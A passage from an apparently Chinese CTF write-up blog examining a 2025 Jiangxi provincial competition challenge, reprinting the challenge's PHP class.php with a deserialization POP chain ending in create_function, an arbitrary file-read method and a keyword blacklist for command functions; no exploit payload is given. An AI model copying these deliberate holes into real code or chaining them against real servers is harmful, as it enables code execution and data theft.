<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120195932888.png"
	width="1540"
	height="678"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120195932888_hu1559177820259756590.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120195932888_hu5969907929989279688.png 1024w"
	loading="lazy"
	
		alt="image-20251120195932888"
	
	
		class="gallery-image" 
		data-flex-grow="227"
		data-flex-basis="545px"
	
></p>
<p>然后我们再看到<code>delete_file.php</code>的逻辑，也是创建了file的对象。重点看来就是class.php了</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120200533866.png"
	width="1109"
	height="254"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120200533866_hu15080702967527162564.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120200533866_hu16927319351449442024.png 1024w"
	loading="lazy"
	
		alt="image-20251120200533866"
	
	
		class="gallery-image" 
		data-flex-grow="436"
		data-flex-basis="1047px"
	
></p>
<p><code>class.php</code>发现是一个类似pop链的东西，这里我们先审计一下<code>file</code>类</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span><span class="lnt">61
</span><span class="lnt">62
</span><span class="lnt">63
</span><span class="lnt">64
</span><span class="lnt">65
</span><span class="lnt">66
</span><span class="lnt">67
</span><span class="lnt">68
</span><span class="lnt">69
</span><span class="lnt">70
</span><span class="lnt">71
</span><span class="lnt">72
</span><span class="lnt">73
</span><span class="lnt">74
</span><span class="lnt">75
</span><span class="lnt">76
</span><span class="lnt">77
</span><span class="lnt">78
</span><span class="lnt">79
</span><span class="lnt">80
</span><span class="lnt">81
</span><span class="lnt">82
</span><span class="lnt">83
</span><span class="lnt">84
</span><span class="lnt">85
</span><span class="lnt">86
</span><span class="lnt">87
</span><span class="lnt">88
</span><span class="lnt">89
</span><span class="lnt">90
</span><span class="lnt">91
</span><span class="lnt">92
</span><span class="lnt">93
</span><span class="lnt">94
</span><span class="lnt">95
</span><span class="lnt">96
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">bc0n</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$code</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$about</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__get</span><span class="p">(</span><span class="nv">$a</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">about</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">            <span class="nx">create_function</span><span class="p">(</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">code</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">check</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$s1</span> <span class="o">=</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$s1</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">rn0g</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$echofi</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__toString</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">echofi</span><span class="o">-&gt;</span><span class="na">come</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">qw4e</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">private</span> <span class="nv">$nonono</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$cookie</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">nonono</span> <span class="o">=</span> <span class="nv">$cookie</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__destruct</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nx">is_object</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">nonono</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nx">method_exists</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">nonono</span><span class="p">,</span><span class="s1">&#39;check&#39;</span><span class="p">)</span> <span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">nonono</span><span class="o">-&gt;</span><span class="na">check</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">y3ui</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$ability</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">private</span> <span class="nv">$display</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">check</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nx">preg_match</span><span class="p">(</span><span class="s2">&#34;/va|file|pa|sys|exec|cat/i&#34;</span><span class="p">,</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">ability</span><span class="p">)){</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;hack!!!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span>  <span class="k">function</span> <span class="fm">__call</span><span class="p">(</span><span class="nv">$a</span><span class="p">,</span><span class="nv">$b</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">display</span><span class="o">-&gt;</span><span class="na">come</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">file</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$fileName</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$file</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">fileName</span> <span class="o">=</span> <span class="nv">$file</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">delfile</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nx">file_exists</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">fileName</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="nx">unlink</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">fileName</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                <span class="k">echo</span> <span class="s2">&#34;文件 </span><span class="si">$this-&gt;fileName</span><span class="s2"> 已成功删除。&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                <span class="k">echo</span> <span class="s2">&#34;无法删除文件 </span><span class="si">$this-&gt;fileName</span><span class="s2">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;文件 </span><span class="si">$this-&gt;fileName</span><span class="s2"> 不存在。&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">viewfile</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nx">file_exists</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">fileName</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$fileContent</span> <span class="o">=</span> <span class="nx">file_get_contents</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">fileName</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">            <span class="c1">// 显示文件内容
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>            <span class="nv">$base64Image</span> <span class="o">=</span> <span class="nx">base64_encode</span><span class="p">(</span><span class="nv">$fileContent</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$imageType</span> <span class="o">=</span> <span class="nx">pathinfo</span><span class="p">(</span><span class="nv">$fileContent</span><span class="p">,</span> <span class="nx">PATHINFO_EXTENSION</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$dataUri</span> <span class="o">=</span> <span class="s1">&#39;data:image/&#39;</span> <span class="o">.</span> <span class="nv">$imageType</span> <span class="o">.</span> <span class="s1">&#39;;base64,&#39;</span> <span class="o">.</span> <span class="nv">$base64Image</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="nv">$dataUri</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;文件不存在。&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>file</code>类的逻辑很好理解一个展示的<code>view</code>，还有一个删除的<code>del</code></p>
<p>额，看半天找不到漏洞在哪了，想起来最后是比赛方给出了flag的文件名，然后可以直接通过那个读取读到flag。</p>
<p>问题出现在，为什么fix是这样的，和这个<code>gif</code>到底有啥关系</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120211039849.png"
	width="1186"
	height="401"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120211039849_hu8098653932991163426.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120211039849_hu4557632059651795441.png 1024w"
	loading="lazy"
	
		alt="image-20251120211039849"
	
	
		class="gallery-image" 
		data-flex-grow="295"
		data-flex-basis="709px"
	
></p>
<p>别人也不知道，行。</p>

</section>


    <footer class="article-footer">
    

    </footer>


    
</article>

    

    

<aside class="related-content--wrapper">
    <h2 class="section-title">相关文章</h2>
    <div class="related-content">
        <div class="flex article-list--tile">
            
                
<article class="">
    <a href="/p/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982025/">
        
        

        <div class="article-details">
            <h2 class="article-title">极客大挑战2025</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/cyberstrikelab%E6%B8%97%E9%80%8F%E5%A4%8D%E7%8E%B0/">
        
        

        <div class="article-details">
            <h2 class="article-title">cyberstrikelab渗透复现</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%E6%B8%97%E9%80%8F%E5%A4%8D%E7%8E%B0/">
        
        

        <div class="article-details">
            <h2 class="article-title">春秋云镜渗透复现</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/qctf2025/">
        
        

        <div class="article-details">
            <h2 class="article-title">qctf2025</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/newstar2025/">
        
        

        <div class="article-details">
            <h2 class="article-title">NewStar2025</h2>
        </div>
    </a>
</article>

            
        </div>
    </div>
</aside>

     
    
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script>
    window.disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (typeof DISQUS == 'object') {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2025 - 
        
        2026 liernian
    </section>
    
    <section class="powerby">
        使用 <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> 构建 <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.30.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.59729e8016d63fb571847b33800c7f0e48c9acdb8eaed3eec3e94d3bcad55aca.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
